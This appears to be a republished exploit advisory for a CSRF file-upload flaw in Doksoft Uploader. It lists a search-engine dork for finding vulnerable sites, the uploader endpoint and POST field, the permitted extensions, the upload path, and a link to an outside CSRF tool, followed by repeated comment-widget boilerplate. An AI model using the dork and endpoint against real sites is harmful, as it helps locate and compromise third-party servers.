Doksoft Uploader CSRF File Upload

Doksoft Uploader CSRF File Upload
2023-12-4 05:24:17 Author: cxsecurity.com(查看原文) 阅读量:15 收藏

Doksoft Uploader CSRF File Upload

Dork: inurl:/doksoft_uploader/userfiles/ Author: L4663r666h05t Thanks: Bivokids - Manadoghost - Indonesian Code Party Exploit: /doksoft_uploader/uploader.php?type=Files CSRF post files: files[] Allowed files extension: 7z, aiff, asf, avi, bmp, csv, doc, docx, fla flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3 mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt pptx, pxd, qt, ram, rar, rm, rmi, rmvb, rtf sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff txt, vsd, wav, wma, wmv, xls, xlsx, zip Path File: /doksoft_uploader/userfiles/files.jpg CSRF: http://v1.exploits.my.id/?tools=csrf

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

文章来源: https://cxsecurity.com/issue/WLB-2023120001
如有侵权请联系:admin#unsafe.sh

Doksoft Uploader CSRF File Upload

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.